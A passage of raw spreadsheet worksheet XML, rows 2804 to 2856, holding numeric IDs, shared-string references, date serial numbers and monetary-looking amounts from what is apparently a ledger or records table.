        <v>22636</v>
      </c>
      <c r="B2804">
        <v>1369</v>
      </c>
      <c r="C2804" t="s">
        <v>3691</v>
      </c>
      <c r="D2804" t="s">
        <v>12160</v>
      </c>
      <c r="E2804">
        <v>3</v>
      </c>
      <c r="F2804" t="s">
        <v>11351</v>
      </c>
      <c r="G2804" s="1">
        <v>44117</v>
      </c>
      <c r="H2804">
        <v>360</v>
      </c>
      <c r="I2804" t="s">
        <v>12161</v>
      </c>
    </row>
    <row r="2805" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2805">
        <v>22639</v>
      </c>
      <c r="B2805">
        <v>1369</v>
      </c>
      <c r="C2805" t="s">
        <v>3691</v>
      </c>
      <c r="D2805" t="s">
        <v>12160</v>
      </c>
      <c r="E2805">
        <v>3</v>
      </c>
      <c r="F2805" t="s">
        <v>12162</v>
      </c>
      <c r="G2805" s="1">
        <v>44117</v>
      </c>
      <c r="H2805">
        <v>360</v>
      </c>
      <c r="I2805" t="s">
        <v>12161</v>
      </c>
    </row>
    <row r="2806" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2806">
        <v>22640</v>
      </c>
      <c r="B2806">
        <v>1854</v>
      </c>
      <c r="C2806" t="s">
        <v>6304</v>
      </c>
      <c r="D2806" t="s">
        <v>11891</v>
      </c>
      <c r="E2806">
        <v>33</v>
      </c>
      <c r="F2806" t="s">
        <v>12163</v>
      </c>
      <c r="G2806" s="1">
        <v>44119</v>
      </c>
      <c r="H2806">
        <v>100000</v>
      </c>
      <c r="I2806" t="s">
        <v>9693</v>
      </c>
      <c r="J2806" t="s">
        <v>12164</v>
      </c>
    </row>
    <row r="2807" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2807">
        <v>22641</v>
      </c>
      <c r="B2807">
        <v>1854</v>
      </c>
      <c r="C2807" t="s">
        <v>6304</v>
      </c>
      <c r="D2807" t="s">
        <v>11891</v>
      </c>
      <c r="E2807">
        <v>33</v>
      </c>
      <c r="F2807" t="s">
        <v>1746</v>
      </c>
      <c r="G2807" s="1">
        <v>44119</v>
      </c>
      <c r="H2807">
        <v>50000</v>
      </c>
    </row>
    <row r="2808" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2808">
        <v>22642</v>
      </c>
      <c r="B2808">
        <v>2597</v>
      </c>
      <c r="C2808" t="s">
        <v>16454</v>
      </c>
      <c r="D2808" t="s">
        <v>16455</v>
      </c>
      <c r="E2808">
        <v>16</v>
      </c>
      <c r="F2808" t="s">
        <v>9437</v>
      </c>
      <c r="G2808" s="1">
        <v>44294</v>
      </c>
      <c r="H2808" s="4">
        <v>150000000</v>
      </c>
      <c r="I2808" t="s">
        <v>9550</v>
      </c>
      <c r="J2808" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="2809" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2809">
        <v>22643</v>
      </c>
      <c r="B2809">
        <v>2608</v>
      </c>
      <c r="C2809" t="s">
        <v>5292</v>
      </c>
      <c r="D2809" t="s">
        <v>10088</v>
      </c>
      <c r="E2809">
        <v>2</v>
      </c>
      <c r="F2809" t="s">
        <v>9437</v>
      </c>
      <c r="G2809" s="1">
        <v>44120</v>
      </c>
      <c r="H2809">
        <v>243500</v>
      </c>
      <c r="J2809" t="s">
        <v>12166</v>
      </c>
    </row>
    <row r="2810" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2810">
        <v>22644</v>
      </c>
      <c r="B2810">
        <v>2608</v>
      </c>
      <c r="C2810" t="s">
        <v>5292</v>
      </c>
      <c r="D2810" t="s">
        <v>10088</v>
      </c>
      <c r="E2810">
        <v>2</v>
      </c>
      <c r="F2810" t="s">
        <v>9595</v>
      </c>
      <c r="G2810" s="1">
        <v>44120</v>
      </c>
      <c r="H2810">
        <v>5200</v>
      </c>
      <c r="J2810" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="2811" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2811">
        <v>22645</v>
      </c>
      <c r="B2811">
        <v>2608</v>
      </c>
      <c r="C2811" t="s">
        <v>5292</v>
      </c>
      <c r="D2811" t="s">
        <v>10088</v>
      </c>
      <c r="E2811">
        <v>2</v>
      </c>
      <c r="F2811" t="s">
        <v>12167</v>
      </c>
      <c r="G2811" s="1">
        <v>44120</v>
      </c>
      <c r="H2811">
        <v>0</v>
      </c>
      <c r="J2811" t="s">
        <v>11948</v>
      </c>
    </row>
    <row r="2812" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2812">
        <v>22646</v>
      </c>
      <c r="B2812">
        <v>2608</v>
      </c>
      <c r="C2812" t="s">
        <v>5292</v>
      </c>
      <c r="D2812" t="s">
        <v>10088</v>
      </c>
      <c r="E2812">
        <v>2</v>
      </c>
      <c r="F2812" t="s">
        <v>12168</v>
      </c>
      <c r="G2812" s="1">
        <v>44120</v>
      </c>
      <c r="H2812">
        <v>0</v>
      </c>
      <c r="J2812" t="s">
        <v>11948</v>
      </c>
    </row>
    <row r="2813" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2813">
        <v>22647</v>
      </c>
      <c r="B2813">
        <v>2608</v>
      </c>
      <c r="C2813" t="s">
        <v>5292</v>
      </c>
      <c r="D2813" t="s">
        <v>10088</v>
      </c>
      <c r="E2813">
        <v>2</v>
      </c>
      <c r="F2813" t="s">
        <v>12169</v>
      </c>
      <c r="G2813" s="1">
        <v>44120</v>
      </c>
      <c r="H2813">
        <v>11000</v>
      </c>
      <c r="J2813" t="s">
        <v>11736</v>
      </c>
    </row>
    <row r="2814" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2814">
        <v>22648</v>
      </c>
      <c r="B2814">
        <v>2608</v>
      </c>
      <c r="C2814" t="s">
        <v>5292</v>
      </c>
      <c r="D2814" t="s">
        <v>10088</v>
      </c>
      <c r="E2814">
        <v>2</v>
      </c>
      <c r="F2814" t="s">
        <v>1746</v>
      </c>
      <c r="G2814" s="1">
        <v>44120</v>
      </c>
      <c r="H2814">
        <v>0</v>
      </c>
      <c r="J2814" t="s">
        <v>12170</v>
      </c>
    </row>
    <row r="2815" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2815">
        <v>22649</v>
      </c>
      <c r="B2815">
        <v>2597</v>
      </c>
      <c r="C2815" t="s">
        <v>16454</v>
      </c>
      <c r="D2815" t="s">
        <v>16455</v>
      </c>
      <c r="E2815">
        <v>16</v>
      </c>
      <c r="F2815" t="s">
        <v>12171</v>
      </c>
      <c r="G2815" s="1">
        <v>44294</v>
      </c>
      <c r="H2815" s="4">
        <v>150000000</v>
      </c>
      <c r="I2815" t="s">
        <v>10442</v>
      </c>
      <c r="J2815" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="2816" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2816">
        <v>22653</v>
      </c>
      <c r="B2816">
        <v>5002</v>
      </c>
      <c r="C2816" t="s">
        <v>7761</v>
      </c>
      <c r="D2816" t="s">
        <v>12172</v>
      </c>
      <c r="E2816">
        <v>23</v>
      </c>
      <c r="F2816" t="s">
        <v>547</v>
      </c>
      <c r="G2816" s="1">
        <v>44110</v>
      </c>
      <c r="H2816">
        <v>12000</v>
      </c>
      <c r="J2816" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2817" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2817">
        <v>22661</v>
      </c>
      <c r="B2817">
        <v>2300</v>
      </c>
      <c r="C2817" t="s">
        <v>6317</v>
      </c>
      <c r="D2817" t="s">
        <v>12173</v>
      </c>
      <c r="E2817">
        <v>5</v>
      </c>
      <c r="F2817" t="s">
        <v>12174</v>
      </c>
      <c r="G2817" s="1">
        <v>44152</v>
      </c>
      <c r="H2817">
        <v>30000</v>
      </c>
      <c r="I2817" t="s">
        <v>12120</v>
      </c>
      <c r="J2817" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2818" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2818">
        <v>22662</v>
      </c>
      <c r="B2818">
        <v>5005</v>
      </c>
      <c r="C2818" t="s">
        <v>7768</v>
      </c>
      <c r="D2818" t="s">
        <v>12175</v>
      </c>
      <c r="E2818">
        <v>12</v>
      </c>
      <c r="F2818" t="s">
        <v>9561</v>
      </c>
      <c r="G2818" s="1">
        <v>44110</v>
      </c>
      <c r="H2818">
        <v>0</v>
      </c>
    </row>
    <row r="2819" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2819">
        <v>22663</v>
      </c>
      <c r="B2819">
        <v>5005</v>
      </c>
      <c r="C2819" t="s">
        <v>7768</v>
      </c>
      <c r="D2819" t="s">
        <v>12175</v>
      </c>
      <c r="E2819">
        <v>12</v>
      </c>
      <c r="F2819" t="s">
        <v>9438</v>
      </c>
      <c r="G2819" s="1">
        <v>44110</v>
      </c>
      <c r="H2819">
        <v>0</v>
      </c>
    </row>
    <row r="2820" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2820">
        <v>22664</v>
      </c>
      <c r="B2820">
        <v>5005</v>
      </c>
      <c r="C2820" t="s">
        <v>7768</v>
      </c>
      <c r="D2820" t="s">
        <v>12175</v>
      </c>
      <c r="E2820">
        <v>12</v>
      </c>
      <c r="F2820" t="s">
        <v>12176</v>
      </c>
      <c r="G2820" s="1">
        <v>44110</v>
      </c>
      <c r="H2820">
        <v>0</v>
      </c>
    </row>
    <row r="2821" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2821">
        <v>22665</v>
      </c>
      <c r="B2821">
        <v>2339</v>
      </c>
      <c r="C2821" t="s">
        <v>6324</v>
      </c>
      <c r="D2821" t="s">
        <v>12177</v>
      </c>
      <c r="E2821">
        <v>1</v>
      </c>
      <c r="F2821" t="s">
        <v>3341</v>
      </c>
      <c r="G2821" s="1">
        <v>44117</v>
      </c>
      <c r="H2821">
        <v>600</v>
      </c>
      <c r="I2821" t="s">
        <v>12178</v>
      </c>
    </row>
    <row r="2822" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2822">
        <v>22666</v>
      </c>
      <c r="B2822">
        <v>2300</v>
      </c>
      <c r="C2822" t="s">
        <v>6317</v>
      </c>
      <c r="D2822" t="s">
        <v>12173</v>
      </c>
      <c r="E2822">
        <v>5</v>
      </c>
      <c r="F2822" t="s">
        <v>12179</v>
      </c>
      <c r="G2822" s="1">
        <v>44152</v>
      </c>
      <c r="H2822">
        <v>120000</v>
      </c>
      <c r="I2822" t="s">
        <v>12120</v>
      </c>
      <c r="J2822" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2823" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2823">
        <v>22667</v>
      </c>
      <c r="B2823">
        <v>2300</v>
      </c>
      <c r="C2823" t="s">
        <v>6317</v>
      </c>
      <c r="D2823" t="s">
        <v>12173</v>
      </c>
      <c r="E2823">
        <v>5</v>
      </c>
      <c r="F2823" t="s">
        <v>7241</v>
      </c>
      <c r="G2823" s="1">
        <v>44152</v>
      </c>
      <c r="H2823">
        <v>7000</v>
      </c>
      <c r="I2823" t="s">
        <v>12120</v>
      </c>
      <c r="J2823" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2824" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2824">
        <v>22668</v>
      </c>
      <c r="B2824">
        <v>4915</v>
      </c>
      <c r="C2824" t="s">
        <v>7744</v>
      </c>
      <c r="D2824" t="s">
        <v>12180</v>
      </c>
      <c r="E2824">
        <v>16</v>
      </c>
      <c r="F2824" t="s">
        <v>7746</v>
      </c>
      <c r="G2824" s="1">
        <v>44137</v>
      </c>
      <c r="H2824">
        <v>3700</v>
      </c>
      <c r="I2824" t="s">
        <v>12181</v>
      </c>
      <c r="J2824" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2825" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2825">
        <v>22669</v>
      </c>
      <c r="B2825">
        <v>2035</v>
      </c>
      <c r="C2825" t="s">
        <v>6280</v>
      </c>
      <c r="D2825" t="s">
        <v>12030</v>
      </c>
      <c r="E2825">
        <v>29</v>
      </c>
      <c r="F2825" t="s">
        <v>12182</v>
      </c>
      <c r="G2825" s="1">
        <v>44159</v>
      </c>
      <c r="H2825">
        <v>1000</v>
      </c>
      <c r="I2825" t="s">
        <v>9550</v>
      </c>
      <c r="J2825" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="2826" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2826">
        <v>22670</v>
      </c>
      <c r="B2826">
        <v>2035</v>
      </c>
      <c r="C2826" t="s">
        <v>6280</v>
      </c>
      <c r="D2826" t="s">
        <v>12030</v>
      </c>
      <c r="E2826">
        <v>29</v>
      </c>
      <c r="F2826" t="s">
        <v>9523</v>
      </c>
      <c r="G2826" s="1">
        <v>44159</v>
      </c>
      <c r="H2826">
        <v>50</v>
      </c>
    </row>
    <row r="2827" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2827">
        <v>22671</v>
      </c>
      <c r="B2827">
        <v>5025</v>
      </c>
      <c r="C2827" t="s">
        <v>7781</v>
      </c>
      <c r="D2827" t="s">
        <v>12183</v>
      </c>
      <c r="E2827">
        <v>16</v>
      </c>
      <c r="F2827" t="s">
        <v>12184</v>
      </c>
      <c r="G2827" s="1">
        <v>44137</v>
      </c>
      <c r="H2827">
        <v>100000</v>
      </c>
      <c r="I2827" t="s">
        <v>9738</v>
      </c>
      <c r="J2827" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="2828" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2828">
        <v>22672</v>
      </c>
      <c r="B2828">
        <v>5025</v>
      </c>
      <c r="C2828" t="s">
        <v>7781</v>
      </c>
      <c r="D2828" t="s">
        <v>12183</v>
      </c>
      <c r="E2828">
        <v>16</v>
      </c>
      <c r="F2828" t="s">
        <v>12185</v>
      </c>
      <c r="G2828" s="1">
        <v>44137</v>
      </c>
      <c r="H2828">
        <v>100000</v>
      </c>
      <c r="I2828" t="s">
        <v>9738</v>
      </c>
      <c r="J2828" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="2829" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2829">
        <v>22673</v>
      </c>
      <c r="B2829">
        <v>5025</v>
      </c>
      <c r="C2829" t="s">
        <v>7781</v>
      </c>
      <c r="D2829" t="s">
        <v>12183</v>
      </c>
      <c r="E2829">
        <v>16</v>
      </c>
      <c r="F2829" t="s">
        <v>12186</v>
      </c>
      <c r="G2829" s="1">
        <v>44137</v>
      </c>
      <c r="H2829">
        <v>100000</v>
      </c>
      <c r="I2829" t="s">
        <v>9738</v>
      </c>
      <c r="J2829" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="2830" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2830">
        <v>22674</v>
      </c>
      <c r="B2830">
        <v>5025</v>
      </c>
      <c r="C2830" t="s">
        <v>7781</v>
      </c>
      <c r="D2830" t="s">
        <v>12183</v>
      </c>
      <c r="E2830">
        <v>16</v>
      </c>
      <c r="F2830" t="s">
        <v>8913</v>
      </c>
      <c r="G2830" s="1">
        <v>44137</v>
      </c>
      <c r="H2830">
        <v>100000</v>
      </c>
      <c r="I2830" t="s">
        <v>9738</v>
      </c>
      <c r="J2830" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="2831" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2831">
        <v>22675</v>
      </c>
      <c r="B2831">
        <v>650</v>
      </c>
      <c r="C2831" t="s">
        <v>616</v>
      </c>
      <c r="D2831" t="s">
        <v>12187</v>
      </c>
      <c r="E2831">
        <v>11</v>
      </c>
      <c r="F2831" t="s">
        <v>9217</v>
      </c>
      <c r="G2831" s="1">
        <v>44110</v>
      </c>
      <c r="H2831">
        <v>60000</v>
      </c>
      <c r="I2831" t="s">
        <v>10546</v>
      </c>
      <c r="J2831" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2832" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2832">
        <v>22676</v>
      </c>
      <c r="B2832">
        <v>650</v>
      </c>
      <c r="C2832" t="s">
        <v>616</v>
      </c>
      <c r="D2832" t="s">
        <v>12187</v>
      </c>
      <c r="E2832">
        <v>11</v>
      </c>
      <c r="F2832" t="s">
        <v>9454</v>
      </c>
      <c r="G2832" s="1">
        <v>44110</v>
      </c>
      <c r="H2832">
        <v>80000</v>
      </c>
      <c r="I2832" t="s">
        <v>11340</v>
      </c>
      <c r="J2832" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2833" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2833">
        <v>22677</v>
      </c>
      <c r="B2833">
        <v>650</v>
      </c>
      <c r="C2833" t="s">
        <v>616</v>
      </c>
      <c r="D2833" t="s">
        <v>12187</v>
      </c>
      <c r="E2833">
        <v>11</v>
      </c>
      <c r="F2833" t="s">
        <v>512</v>
      </c>
      <c r="G2833" s="1">
        <v>44110</v>
      </c>
      <c r="H2833">
        <v>48000</v>
      </c>
      <c r="I2833" t="s">
        <v>11340</v>
      </c>
      <c r="J2833" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2834" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2834">
        <v>22678</v>
      </c>
      <c r="B2834">
        <v>4978</v>
      </c>
      <c r="C2834" t="s">
        <v>7731</v>
      </c>
      <c r="D2834" t="s">
        <v>12188</v>
      </c>
      <c r="E2834">
        <v>26</v>
      </c>
      <c r="F2834" t="s">
        <v>364</v>
      </c>
      <c r="G2834" s="1">
        <v>44327</v>
      </c>
      <c r="H2834">
        <v>1000000</v>
      </c>
      <c r="J2834" t="s">
        <v>12189</v>
      </c>
    </row>
    <row r="2835" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2835">
        <v>22683</v>
      </c>
      <c r="B2835">
        <v>4906</v>
      </c>
      <c r="C2835" t="s">
        <v>5329</v>
      </c>
      <c r="D2835" t="s">
        <v>12190</v>
      </c>
      <c r="E2835">
        <v>16</v>
      </c>
      <c r="F2835" t="s">
        <v>1207</v>
      </c>
      <c r="G2835" s="1">
        <v>44183</v>
      </c>
      <c r="H2835">
        <v>70000</v>
      </c>
      <c r="J2835" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="2836" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2836">
        <v>22684</v>
      </c>
      <c r="B2836">
        <v>1507</v>
      </c>
      <c r="C2836" t="s">
        <v>2937</v>
      </c>
      <c r="D2836" t="s">
        <v>12191</v>
      </c>
      <c r="E2836">
        <v>12</v>
      </c>
      <c r="F2836" t="s">
        <v>10581</v>
      </c>
      <c r="G2836" s="1">
        <v>44153</v>
      </c>
      <c r="H2836">
        <v>0</v>
      </c>
      <c r="I2836" t="s">
        <v>11966</v>
      </c>
    </row>
    <row r="2837" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2837">
        <v>22685</v>
      </c>
      <c r="B2837">
        <v>1507</v>
      </c>
      <c r="C2837" t="s">
        <v>2937</v>
      </c>
      <c r="D2837" t="s">
        <v>12191</v>
      </c>
      <c r="E2837">
        <v>12</v>
      </c>
      <c r="F2837" t="s">
        <v>12192</v>
      </c>
      <c r="G2837" s="1">
        <v>44153</v>
      </c>
      <c r="H2837">
        <v>0</v>
      </c>
      <c r="I2837" t="s">
        <v>11966</v>
      </c>
    </row>
    <row r="2838" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2838">
        <v>22686</v>
      </c>
      <c r="B2838">
        <v>1507</v>
      </c>
      <c r="C2838" t="s">
        <v>2937</v>
      </c>
      <c r="D2838" t="s">
        <v>12191</v>
      </c>
      <c r="E2838">
        <v>12</v>
      </c>
      <c r="F2838" t="s">
        <v>9775</v>
      </c>
      <c r="G2838" s="1">
        <v>44153</v>
      </c>
      <c r="H2838">
        <v>0</v>
      </c>
      <c r="I2838" t="s">
        <v>11966</v>
      </c>
    </row>
    <row r="2839" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2839">
        <v>22687</v>
      </c>
      <c r="B2839">
        <v>1623</v>
      </c>
      <c r="C2839" t="s">
        <v>3700</v>
      </c>
      <c r="D2839" t="s">
        <v>12193</v>
      </c>
      <c r="E2839">
        <v>31</v>
      </c>
      <c r="F2839" t="s">
        <v>2236</v>
      </c>
      <c r="G2839" s="1">
        <v>44131</v>
      </c>
      <c r="H2839">
        <v>500000</v>
      </c>
      <c r="J2839" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2840" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2840">
        <v>22688</v>
      </c>
      <c r="B2840">
        <v>1623</v>
      </c>
      <c r="C2840" t="s">
        <v>3700</v>
      </c>
      <c r="D2840" t="s">
        <v>12193</v>
      </c>
      <c r="E2840">
        <v>31</v>
      </c>
      <c r="F2840" t="s">
        <v>3763</v>
      </c>
      <c r="G2840" s="1">
        <v>44131</v>
      </c>
      <c r="H2840">
        <v>100000</v>
      </c>
      <c r="J2840" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2841" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2841">
        <v>22690</v>
      </c>
      <c r="B2841">
        <v>1623</v>
      </c>
      <c r="C2841" t="s">
        <v>3700</v>
      </c>
      <c r="D2841" t="s">
        <v>12193</v>
      </c>
      <c r="E2841">
        <v>31</v>
      </c>
      <c r="F2841" t="s">
        <v>6917</v>
      </c>
      <c r="G2841" s="1">
        <v>44131</v>
      </c>
      <c r="H2841">
        <v>100000</v>
      </c>
      <c r="J2841" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2842" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2842">
        <v>22691</v>
      </c>
      <c r="B2842">
        <v>1623</v>
      </c>
      <c r="C2842" t="s">
        <v>3700</v>
      </c>
      <c r="D2842" t="s">
        <v>12193</v>
      </c>
      <c r="E2842">
        <v>31</v>
      </c>
      <c r="F2842" t="s">
        <v>11800</v>
      </c>
      <c r="G2842" s="1">
        <v>44131</v>
      </c>
      <c r="H2842">
        <v>100000</v>
      </c>
      <c r="I2842" t="s">
        <v>10323</v>
      </c>
      <c r="J2842" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2843" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2843">
        <v>22693</v>
      </c>
      <c r="B2843">
        <v>2035</v>
      </c>
      <c r="C2843" t="s">
        <v>6280</v>
      </c>
      <c r="D2843" t="s">
        <v>12030</v>
      </c>
      <c r="E2843">
        <v>29</v>
      </c>
      <c r="F2843" t="s">
        <v>12194</v>
      </c>
      <c r="G2843" s="1">
        <v>44159</v>
      </c>
      <c r="H2843">
        <v>500</v>
      </c>
      <c r="J2843" t="s">
        <v>10663</v>
      </c>
    </row>
    <row r="2844" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2844">
        <v>22696</v>
      </c>
      <c r="B2844">
        <v>5031</v>
      </c>
      <c r="C2844" t="s">
        <v>4926</v>
      </c>
      <c r="D2844" t="s">
        <v>12195</v>
      </c>
      <c r="E2844">
        <v>29</v>
      </c>
      <c r="F2844" t="s">
        <v>12196</v>
      </c>
      <c r="G2844" s="1">
        <v>44126</v>
      </c>
      <c r="H2844">
        <v>1788</v>
      </c>
      <c r="I2844" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2845" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2845">
        <v>22697</v>
      </c>
      <c r="B2845">
        <v>722</v>
      </c>
      <c r="C2845" t="s">
        <v>344</v>
      </c>
      <c r="D2845" t="s">
        <v>12197</v>
      </c>
      <c r="E2845">
        <v>10</v>
      </c>
      <c r="F2845" t="s">
        <v>12198</v>
      </c>
      <c r="G2845" s="1">
        <v>44147</v>
      </c>
      <c r="H2845">
        <v>390000</v>
      </c>
      <c r="J2845" t="s">
        <v>12199</v>
      </c>
    </row>
    <row r="2846" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2846">
        <v>22698</v>
      </c>
      <c r="B2846">
        <v>722</v>
      </c>
      <c r="C2846" t="s">
        <v>344</v>
      </c>
      <c r="D2846" t="s">
        <v>12197</v>
      </c>
      <c r="E2846">
        <v>10</v>
      </c>
      <c r="F2846" t="s">
        <v>12200</v>
      </c>
      <c r="G2846" s="1">
        <v>44147</v>
      </c>
      <c r="H2846">
        <v>270000</v>
      </c>
      <c r="J2846" t="s">
        <v>12201</v>
      </c>
    </row>
    <row r="2847" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2847">
        <v>22699</v>
      </c>
      <c r="B2847">
        <v>331</v>
      </c>
      <c r="C2847" t="s">
        <v>16456</v>
      </c>
      <c r="D2847" t="s">
        <v>16332</v>
      </c>
      <c r="E2847">
        <v>17</v>
      </c>
      <c r="F2847" t="s">
        <v>9561</v>
      </c>
      <c r="G2847" s="1">
        <v>44120</v>
      </c>
      <c r="H2847" s="4">
        <v>33997</v>
      </c>
      <c r="J2847" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="2848" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2848">
        <v>22700</v>
      </c>
      <c r="B2848">
        <v>331</v>
      </c>
      <c r="C2848" t="s">
        <v>16456</v>
      </c>
      <c r="D2848" t="s">
        <v>16332</v>
      </c>
      <c r="E2848">
        <v>17</v>
      </c>
      <c r="F2848" t="s">
        <v>2236</v>
      </c>
      <c r="G2848" s="1">
        <v>44120</v>
      </c>
      <c r="H2848" s="4">
        <v>181443</v>
      </c>
      <c r="I2848" t="s">
        <v>12202</v>
      </c>
    </row>
    <row r="2849" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2849">
        <v>22701</v>
      </c>
      <c r="B2849">
        <v>331</v>
      </c>
      <c r="C2849" t="s">
        <v>16456</v>
      </c>
      <c r="D2849" t="s">
        <v>16332</v>
      </c>
      <c r="E2849">
        <v>17</v>
      </c>
      <c r="F2849" t="s">
        <v>9470</v>
      </c>
      <c r="G2849" s="1">
        <v>44120</v>
      </c>
      <c r="H2849" s="4">
        <v>4432</v>
      </c>
      <c r="J2849" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="2850" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2850">
        <v>22702</v>
      </c>
      <c r="B2850">
        <v>331</v>
      </c>
      <c r="C2850" t="s">
        <v>1953</v>
      </c>
      <c r="D2850" t="s">
        <v>10258</v>
      </c>
      <c r="E2850">
        <v>17</v>
      </c>
      <c r="F2850" t="s">
        <v>4686</v>
      </c>
      <c r="G2850" s="1">
        <v>44120</v>
      </c>
      <c r="H2850">
        <v>0</v>
      </c>
      <c r="J2850" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2851" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2851">
        <v>22709</v>
      </c>
      <c r="B2851">
        <v>1141</v>
      </c>
      <c r="C2851" t="s">
        <v>2635</v>
      </c>
      <c r="D2851" t="s">
        <v>10152</v>
      </c>
      <c r="E2851">
        <v>13</v>
      </c>
      <c r="F2851" t="s">
        <v>12203</v>
      </c>
      <c r="G2851" s="1">
        <v>44145</v>
      </c>
      <c r="H2851">
        <v>900000</v>
      </c>
      <c r="J2851" t="s">
        <v>12204</v>
      </c>
    </row>
    <row r="2852" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2852">
        <v>22710</v>
      </c>
      <c r="B2852">
        <v>1141</v>
      </c>
      <c r="C2852" t="s">
        <v>2635</v>
      </c>
      <c r="D2852" t="s">
        <v>10152</v>
      </c>
      <c r="E2852">
        <v>13</v>
      </c>
      <c r="F2852" t="s">
        <v>12205</v>
      </c>
      <c r="G2852" s="1">
        <v>44145</v>
      </c>
      <c r="H2852">
        <v>600000</v>
      </c>
      <c r="J2852" t="s">
        <v>12204</v>
      </c>
    </row>
    <row r="2853" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2853">
        <v>22711</v>
      </c>
      <c r="B2853">
        <v>1141</v>
      </c>
      <c r="C2853" t="s">
        <v>2635</v>
      </c>
      <c r="D2853" t="s">
        <v>10152</v>
      </c>
      <c r="E2853">
        <v>13</v>
      </c>
      <c r="F2853" t="s">
        <v>1746</v>
      </c>
      <c r="G2853" s="1">
        <v>44145</v>
      </c>
      <c r="H2853">
        <v>300000</v>
      </c>
      <c r="J2853" t="s">
        <v>12206</v>
      </c>
    </row>
    <row r="2854" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2854">
        <v>22712</v>
      </c>
      <c r="B2854">
        <v>1141</v>
      </c>
      <c r="C2854" t="s">
        <v>2635</v>
      </c>
      <c r="D2854" t="s">
        <v>10152</v>
      </c>
      <c r="E2854">
        <v>13</v>
      </c>
      <c r="F2854" t="s">
        <v>9437</v>
      </c>
      <c r="G2854" s="1">
        <v>44145</v>
      </c>
      <c r="H2854">
        <v>1500000</v>
      </c>
      <c r="J2854" t="s">
        <v>12204</v>
      </c>
    </row>
    <row r="2855" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2855">
        <v>22715</v>
      </c>
      <c r="B2855">
        <v>1126</v>
      </c>
      <c r="C2855" t="s">
        <v>3390</v>
      </c>
      <c r="D2855" t="s">
        <v>12207</v>
      </c>
      <c r="E2855">
        <v>13</v>
      </c>
      <c r="F2855" t="s">
        <v>609</v>
      </c>
      <c r="G2855" s="1">
        <v>44145</v>
      </c>
      <c r="H2855">
        <v>125000</v>
      </c>
      <c r="I2855" t="s">
        <v>12208</v>
      </c>
    </row>
    <row r="2856" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2856">
        <v>22716</v>
      </c>
      <c r="B2856">
        <v>2189</v>
      </c>
      <c r="C2856" t="s">
        <v>6157</v>
      </c>
      <c r="D2856" t="s">
        <v>9650</v>
      </c>
      <c r="E2856">
        <v>26</v>
      </c>
